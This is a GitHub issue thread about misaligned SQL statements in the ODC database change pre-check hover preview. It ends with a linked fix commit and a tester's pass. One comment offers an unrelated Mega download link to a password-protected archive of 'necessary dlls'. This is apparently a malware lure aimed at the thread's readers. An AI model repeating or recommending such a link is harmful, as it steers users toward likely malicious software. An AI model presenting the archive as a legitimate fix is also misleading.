### ISSUE TITLE
[Bug]: The SQL statements in the database change pre-check are not aligned.

### ISSUE THREAD

**Issue by tonghan-gsh** [oceanbase/odc#3479]
### ODC version

ODC 4.3.2

### OB version

No related.

### What happened?

The SQL statements in the database change pre-check are not aligned.
![image](https://github.com/user-attachments/assets/e3d42071-22ef-4dab-a1ec-b2d2a8d3aaef)

### What did you expect to happen?

The mouse hover preview for database changes should be aligned with the statement.

### How can we reproduce it (as minimally and precisely as possible)?

View the details of database change pre-checks and hover SQL statements.

**Comment by SAMBILI** [comment]
try this
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A

Password: changeme
I put the necessary dlls in the archive

**Comment by HSunboy** [comment]
Fixed In Commit [5ccf791b9bde394d628391e0dac7779574d683fe](https://github.com/oceanbase/odc-client/commit/5ccf791b9bde394d628391e0dac7779574d683fe)
            ------
            xiaokang
            Mon Sep 23 11:41:44 2024 +0800

**Comment by sl01388797** [comment]
![Image](https://github.com/user-attachments/assets/8555e058-954d-4069-941d-a1e66ba81978)
pass
